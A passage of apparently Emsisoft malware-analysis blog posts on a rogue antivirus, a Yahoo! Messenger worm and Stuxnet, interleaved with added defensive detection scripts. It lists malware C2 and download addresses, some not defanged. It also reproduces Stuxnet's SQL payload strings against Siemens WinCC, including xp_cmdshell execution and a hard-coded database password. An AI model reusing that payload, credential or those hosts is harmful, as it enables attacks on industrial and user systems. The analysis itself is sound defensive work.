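    known binary only after folding, or that collide with another entry's skeleton."""
    findings = []
    seen = {}  # skeleton -> first name that produced it
    for name in listing:
        sk = skeleton(name)
        reasons = []
        if not name.isascii():
            reasons.append("non-ASCII character in name")
        if sk in known and name.casefold() != sk:
            reasons.append("impersonates " + sk)
        if sk in seen and seen[sk] != name:
            reasons.append("collides with " + seen[sk])
        seen.setdefault(sk, name)
        if reasons:
            findings.append((name, reasons))
    return findings

# Constructed listing: genuine userinit.exe, a Cyrillic-i lookalike, a fullwidth-c lookalike.
CONSTRUCTED_LISTING = ["userinit.exe", "user\u0456nit.exe", "lz32.dll",
                       "\uff43srss.exe", "wininit.exe"]

if __name__ == "__main__":
    for name, reasons in find_lookalikes(CONSTRUCTED_LISTING):
        print(repr(name), "; ".join(reasons))
```

Run against a real System32 listing (os.listdir on the directory), the "collides with" reason is the one that matters most: two entries folding to the same skeleton is exactly the situation the post describes.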

The malware registers itself as a service to start automatically with Windows.

On execution, the malware extracts and builds a PE file in memory named lz32.dll, and makes a remote connection to download another DLL component.
The remote addresses it connects to are:

- 213.174.130.36:8082/ask?t=1&u=5&a=0&m=aa26135f&h=b4e6aeff&s=0&p=0
- 213.174.130.39
- 213.174.130.39:80/update.db
- http://213.174.130.32/verify.js?key=
- http://213.174.130.39/uninstall.js
- https://secure.avsbilling.com/order/get.php?i=antvir&advert=
- https://secure.avsbilling.com/order/activate.php?orderid=
The downloaded malicious DLL is dropped into the System32 directory. It normally has a random eight-letter name, for example mswmqnei.dll or mspnxdcm.dll, and is encrypted. The DLL is loaded into memory to display the main UI of the rogue security product. The UI is built with HTML/JavaScript, which, as we can see, the malware stores in the resource section of the DLL.

Analysing the HTML, in INSTALL.HTML we notice a URL which is currently inactive. Incidentally, the IP address in the URL is the same one the malware uses to download the malicious file.
If visited directly, the IP address presents a website with adult content.

Looking at the registry modifications we found some more information about the rogue product and decided to do more research.

A simple domain lookup on hxxp://www.webtopbilling.com revealed:
Domain Name: WEBTOPBILLING.COM
Registrant:
N/A
Nick Besmark (avbill@ua.fm)
P.O. Box 2494
Victoria
Mahe,00000
SC
Tel. +7.9263901779
Creation Date: 04-May-2010
Expiration Date: 04-May-2011
Domain servers in listed order:
ns2.unitedplatform.com
ns1.unitedplatform.com
There is nothing specifically suspicious about a website registered by someone residing in Mahe, Seychelles, which currently returns a 403 Forbidden message. We then looked at unitedplatform.com, and the first thing we noticed is that we actually land on domaincontext.com, a domain registrar website.
But we didn’t want to leave unitedplatform.com yet, and we stumbled upon http://www.malwareurl.com/ns_listing.php?ns=ns2.unitedplatform.com. The malware domains listed there show more than one instance of malicious activity, and perhaps it is coincidence again that all are recently created domains. We can assume there may be a distant connection, which again demonstrates the inter-relationship between various rogue security products and exploits on the web. It is more than a billion dollar industry out there, but we are always more than a step ahead of them.
Amid email spam, Twitter and Facebook, let us not forget one of the most prevalent media through which malware can spread. Instant messengers have always been a popular medium for malware propagation, and we at Emsisoft Labs recently came across worm-like behavior attempting to spread through Yahoo! Messenger.
The initial picture is not unfamiliar to anyone using Messenger: a message window pops up with a random message such as “Is this you on pic? Hxxp://hyperlink”.

If the victim clicks the hyperlink, the default browser opens and a file download prompt appears. We found the following common executable download names:
- PI6-JPG-www.facebook.com.exe
- PIC007-JPG-www.facebook.com.exe
- PIC67576-JPG-www.facebook.com.exe
- PIC676-JPG-www.facebook.com.exe
- PIC6781-JPG-www.facebook.com.exe
- IMG0018.exe

Analysing further, we see the parent URLs as below:
- hxxp://75.102.36.231/*****45336-JPG-www.facebook.com.exe
- hxxp://migre.me/*****?=www.facebook.com/photo.php?=
- hxxp://66.49.214.28/~av***/IMG0018.exe
- hxxp://66.49.214.28/~av***/PI6-JPG-www.facebook.com.exe
- hxxp://66.49.214.28/~av***/PIC007-JPG-www.facebook.com.exe
- hxxp://66.49.214.28/~av***/PIC67576-JPG-www.facebook.com.exe
- hxxp://66.49.214.28/~av***/PIC676-JPG-www.facebook.com.exe
- hxxp://66.49.214.28/~av***/PIC6781-JPG-www.facebook.com.exe
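
The lure links above share two tells: an executable whose file name is dressed up as a picture, and a trusted domain name that appears in the path or query string rather than in the host. The following is an added example, not Emsisoft's code, that pulls links out of message text and reports those tells; the messages, hosts (documentation IP ranges, example.net) and paths are constructed, since the post masks its real ones.

```python
"""Classify download links from instant-messenger lures: image-like names on
executables and trusted domains embedded outside the host. Added example;
the sample messages are constructed."""
import re
from urllib.parse import urlparse

URL_RE = re.compile(r"\bh(?:xx|tt)ps?://[^\s\"'<>]+", re.IGNORECASE)
# "pic", "img", "jpg" etc. as a token at the start or after a separator
IMAGE_WORDS = re.compile(r"(?:^|[-_.])(?:pic|img|jpg|jpeg|photo)(?:$|[-_.\d])", re.IGNORECASE)
EXEC_EXT = (".exe", ".scr", ".com", ".pif", ".bat")
TRUSTED_DOMAINS = ("facebook.com", "myspace.com", "yahoo.com")

def refang(url):
    """Turn a defanged hxxp:// link back into a parseable URL."""
    return re.sub(r"^hxxp", "http", url, flags=re.IGNORECASE)

def classify_url(url):
    """Return the list of reasons a link looks like a disguised executable (empty if none)."""
    p = urlparse(refang(url))
    host = p.hostname or ""
    filename = p.path.rsplit("/", 1)[-1]
    reasons = []
    if filename.lower().endswith(EXEC_EXT):
        reasons.append("executable download")
        if IMAGE_WORDS.search(filename):
            reasons.append("image-like name on an executable")
        for domain in TRUSTED_DOMAINS:
            if domain in filename.lower() and not host.endswith(domain):
                reasons.append("embeds %s but served from %s" % (domain, host))
    # Redirector whose query string carries a trusted photo URL (the migre.me pattern above)
    if p.query and any(d in p.query.lower() for d in TRUSTED_DOMAINS) and not host.endswith(TRUSTED_DOMAINS):
        reasons.append("trusted domain hidden in query string")
    return reasons

def scan_messages(messages):
    """Return {url: reasons} for every suspicious link found in the messages."""
    suspicious = {}
    for msg in messages:
        for url in URL_RE.findall(msg):
            reasons = classify_url(url)
            if reasons:
                suspicious[url] = reasons
    return suspicious

# Constructed messages mirroring the lure shapes in the post.
CONSTRUCTED_MESSAGES = [
    "Is this you on pic? hxxp://203.0.113.10/PIC007-JPG-www.facebook.com.exe",
    "lol look hxxp://198.51.100.7/~user/IMG0018.exe",
    "hxxp://short.example.net/abc?=www.facebook.com/photo.php?=",
    "meeting notes: http://intranet.example.net/docs/agenda.pdf",
]

if __name__ == "__main__":
    for url, reasons in scan_messages(CONSTRUCTED_MESSAGES).items():
        print(url, "->", "; ".join(reasons))
```

The same classify_url check can sit in a proxy or mail gateway log pipeline; the defanging step is there because analyst notes and threat feeds usually ship links as hxxp://.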

On execution, the malicious file opens the browser at http://browseusers.myspace.com/Browse/Browse.aspx as a disguise while running its malicious activities in the background.
We did some initial research and, based on some loose strings in the worm, tried to work out the payload. The worm locates the Yahoo! Messenger application by searching for the window class named “YahooBuddyMain”, and then emulates keyboard events to send fake messages to all Yahoo! Messenger contacts.

Incidentally, the worm also tries to spread itself through IRC; below is an IRC traffic log event.

The malware also monitors keystrokes using the GetKeyState and GetAsyncKeyState APIs, suggesting possible keylogger activity.
There have been quite a few security incidents related to USB/flash drives and autorun behavior. Since the usability and portability of such media are advantageous to users, it was only a matter of time before they were exploited by malware authors.
A recently discovered threat is getting some attention, and we at Emsisoft want to make sure users are aware of it and know more than just its name. The threat is detected by Emsisoft Anti-Malware as Stuxnet, and is also called TmpHider by some other vendors.

The malware already has quite a few detections, and as reported by VirusBlokAda, its propagation method distinguishes it from the already prevalent drive- and autorun-based variants. Stuxnet spreads through flash drives and does not require user interaction at all, unlike other malware that relies on the autorun feature of the same drives. The malware uses specially created .LNK files to carry out its execution. Emsisoft Anti-Malware detects the exploit .LNK file as Exploit.LNK.CVE-2010-2568.

The following files have been seen on an infected flash disk:
- ~WTR4132.tmp
- ~WTR4141.tmp
- Copy of Shortcut to .lnk
- Copy of Copy of Shortcut to .lnk
- Copy of Copy of Copy of Shortcut to .lnk
- Copy of Copy of Copy of Copy of Shortcut to .lnk
Once the user opens the flash drive in Windows Explorer and Explorer renders the shortcut’s icon, the malicious files, namely the .TMP files, are run automatically. The subsequent events happen without any user interaction or intervention.
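
Both removable-media patterns on this page, the autorun.inf that launches a hidden executable in the worm write-up earlier and the Stuxnet pairing of shortcut files with ~WTR####.tmp payloads just described, can be triaged from a plain directory listing before Explorer ever renders an icon. The following is an added example, not Emsisoft's code: it builds a throwaway directory with constructed file names so it runs anywhere, and scan_drive_root is what you would point at the drive root (mounted read-only, or with autorun disabled) on a real machine. The autorun.inf contents and the "Sample CV 2010.exe" name are constructed stand-ins for the %UserName% CV 2010.exe and open.exe files the post lists.

```python
"""Triage the root of a removable drive for autorun.inf launch targets, the
Stuxnet .LNK / ~WTR####.tmp pairing, and loose executables. Added example;
the sample drive contents are constructed."""
import configparser
import os
import re
import tempfile

LNK_NAME = re.compile(r"^(?:copy of )*shortcut to .*\.lnk$", re.IGNORECASE)
WTR_TMP = re.compile(r"^~wtr\d{4}\.tmp$", re.IGNORECASE)
EXEC_EXT = (".exe", ".com", ".scr", ".pif", ".bat", ".cmd", ".dll", ".cpl")

def parse_autorun(path):
    """Return the programs an autorun.inf would launch via open=, shellexecute=
    or shell\\<verb>\\command=, de-duplicated, in file order."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.optionxform = str.lower
    try:
        cp.read(path, encoding="latin-1")
    except configparser.Error:
        return ["<unparseable autorun.inf>"]
    section = next((s for s in cp.sections() if s.lower() == "autorun"), None)
    targets = []
    if section is not None:
        for key, value in cp.items(section):
            launches = key in ("open", "shellexecute") or (key.startswith("shell\\") and key.endswith("\\command"))
            if launches and value.strip():
                program = value.strip().split()[0]  # first token is the program
                if program not in targets:
                    targets.append(program)
    return targets

def scan_drive_root(root):
    """Return (finding_type, detail) tuples for the drive root."""
    findings = []
    names = sorted(os.listdir(root))
    lower = {n.lower(): n for n in names}
    if "autorun.inf" in lower:
        for target in parse_autorun(os.path.join(root, lower["autorun.inf"])):
            findings.append(("autorun_launches", target))
    lnks = [n for n in names if LNK_NAME.match(n)]
    tmps = [n for n in names if WTR_TMP.match(n)]
    if lnks and tmps:  # the no-interaction pattern: shortcuts next to the payload DLLs
        findings.append(("lnk_tmp_pair", "%d shortcut(s) alongside %s" % (len(lnks), ", ".join(tmps))))
    for n in names:
        if n.lower().endswith(EXEC_EXT):
            findings.append(("root_executable", n))
    return findings

def build_constructed_drive(malicious=True):
    """Create a temporary directory that mimics an infected (or clean) drive root."""
    root = tempfile.mkdtemp(prefix="usbtriage_")
    open(os.path.join(root, "holiday.jpg"), "wb").close()
    if malicious:
        with open(os.path.join(root, "autorun.inf"), "w") as f:
            f.write("[autorun]\nopen=open.exe\nshell\\open\\command=open.exe\nicon=open.exe\n")
        for n in ("open.exe", "Sample CV 2010.exe", "~WTR4132.tmp", "~WTR4141.tmp",
                  "Copy of Shortcut to .lnk", "Copy of Copy of Shortcut to .lnk"):
            open(os.path.join(root, n), "wb").close()
    return root

if __name__ == "__main__":
    for kind, detail in scan_drive_root(build_constructed_drive()):
        print(kind, detail)
```

Note that the listing-based check finds the Stuxnet carrier by its file-name pattern only; it does not parse the .LNK contents, so a renamed shortcut would need the antivirus signature (Exploit.LNK.CVE-2010-2568 above) rather than this script.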

Let us dig deeper into the malicious events and binaries. The ~wtr4141.tmp and ~wtr4132.tmp files are actually DLLs which get loaded into memory. The malware then extracts two .SYS files named mrxcls.sys and mrxnet.sys, kernel drivers responsible for hooking and hiding the related malicious files. Thus, soon after the malware executes, the files are no longer visible to the naked eye. Also interestingly, if we check the properties of the .SYS files, they are “digitally signed” by “Realtek Semiconductor Corp.”.

The kernel drivers are installed without any notification from Windows, since Windows considers the files trusted on the basis of their digital signatures. VeriSign has since revoked the certificate in question and taken the necessary steps to make sure the malware won’t be able to run smoothly with the fake certificate.
Microsoft has explained that they are still investigating and working on an update to address this vulnerability (CVE-2010-2568). The report does mention that even a completely patched Windows 7, 32-bit or 64-bit, is affected by this vulnerability. The following is the complete list of affected versions of Windows.

Stuxnet goes on to inject its malicious code into the processes services.exe and svchost.exe. In infected processes one can see a module named KERNEL32.DLL.ASLR.XXXXXX. The malware creates the following files on an infected machine:
- %windir%\system32\drivers\mrxcls.sys
- %windir%\system32\drivers\mrxnet.sys
- %windir%\inf\oem6C.PNF
- %windir%\inf\oem7A.PNF
- %windir%\inf\mdmcpq3.PNF
- %windir%\inf\mdmeric3.PNF

Analysis done in our lab revealed many interesting strings:
s7hkimdb.dll
S7EPATDX.CPL
ApiLog\Types
SOFTWARE\Microsoft\MSSQLServer
WinCCConnect
.\WinCC
sqloledb
GracS\cc_tlg7.sav
Step7\Example
use [%s]
declare @t varchar(4000), @e int, @f int if exists (select text from dbo.syscomments where(N'[dbo].[MCPVREADVARPERCON]')) select @t=rtrim(text) from dbo.syscomments c, dbo.sysobjects o where o.id = c.id and c.id = object_id(N'[dbo].[MCPVREADVARPERCON]') set @e=charindex(',openrowset',@t) if @e=0 set @t=right(@t,len(@t)-7) else begin set @f=charindex('sp_msforeachdb',@t) if @f=0 begin set @t=left(@t,@e-1) set @t=right(@t,len(@t)-7) end else select * from fail_in_order_to_return_false end set @t='alter '+@t+',openrowset(''SQLOLEDB'',''Server=.\WinCC;uid=WinCCConnect;pwd=2WSXcder'',''select 0;set IMPLICIT_TRANSACTIONS off;declare @z nvarchar(999);set @z=''''use [?];declare @t nvarchar(2000);declare @s nvarchar(9);set @s=''''''''--CC-S''''''''+char(80);if left(db_name(),2)=''''''''CC'''''''' select @t=substring(text,charindex(@s,text)+8,charindex(''''''''--*'''''''',text)-charindex(@s,text)-8) from syscomments where text like (''''''''%''''''''+@s+''''''''%'''''''');if @t is not NULL exec(@t)'''';ex
declare @t varchar(4000), @e int, @f int if exists (select * from dbo.syscomments where(N'[dbo].[MCPVPROJECT2]')) select @t=rtrim(c.text) from dbo.syscomments c, dbo.sysobjects o where o.id = c.id and c.id = object_id(N'[dbo].[MCPVPROJECT2]') order by c.number, c.colid set @e=charindex('--CC-SP',@t) if @e=0 begin set @f=charindex('where',@t) if @f<>0 set @t=left(@t,@f-1) set @t=right(@t,len(@t)-6) end else select * from fail_in_order_to_return_false set @t='alter '+@t+' where ((SELECT top 1 1 FROM MCPVREADVARPERCON)=''1'') --CC-SP use master;declare @t varchar(999),@s varchar(999),@a int declare r cursor for select filename from master..sysdatabases where (name like ''CC%'') open r fetch next from r into @t while (@@fetch_status<>-1) begin set @t=left(@t,len(@t)-charindex(''\'',reverse(@t)))+''\GraCS\cc_tlg7.sav'';exec master..xp_fileexist @t,@a out;if @a=1 begin set @s = ''master..xp_cmdshell ''''extrac32 /y "''+@t+''" "''+@t+''x"'''''';exec(@s);set @t = @t+''x'';dbcc addextendedproc(s
The strings above are assumed to belong to Siemens SIMATIC WinCC and SIMATIC STEP 7, which are popular software packages used in industrial processes. The malware is supposedly aimed at attacking such systems. Another interesting fact is that the countries most widely affected by this malware are Iran, Indonesia and India.

Microsoft has released a workaround to use until a patch is available; it can be found at http://support.microsoft.com/kb/2286198#FixItForMe. Do update your antivirus software and make sure to scan any external device before using it. We at Emsisoft are constantly working hard to remain ahead, as we always will.